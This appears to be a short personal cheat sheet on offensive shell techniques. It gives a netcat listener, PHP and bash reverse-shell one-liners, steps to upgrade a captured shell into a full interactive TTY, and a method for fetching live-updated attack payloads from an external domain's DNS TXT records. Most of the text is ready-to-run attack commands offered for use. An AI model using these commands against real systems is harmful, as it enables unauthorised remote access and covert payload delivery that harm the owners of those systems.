Some hacking

Crash Course on Reverse Shells

Set up a listener:

nc -lv 4444
php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
bash -c 'sh -i >& /dev/tcp/127.0.0.1/4444 0>&1' 2> /dev/null 1> /dev/null

Upgrading to TTY Shell

Upgrading to Interactive Shell

Note: This will override Ctrl-Z, Ctrl-C, so that they occur in the remote shell. Be prepared to lose the Terminal you opened.

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=/bin/bash

Take note of size in local machine

stty size

Background your listener with Ctrl-Z and then bring back the process:

stty raw -echo;fg

You may want to run reset after (if you didn't set the right TERM variable, it will prompt you for one)

And set the resolution:

stty rows <ROWS> columns <COLS>

Attacks with DNS TXT records

Some script that takes advantage of a TXT record can have its attack be updated in real-time by parsing the record.

nslookup "-q=txt" omg.foolsnasty.com | grep -e "\"*\""

I suppose that in a similar fashion, one can just host the payload on some server in text form and swap out the file that way instead.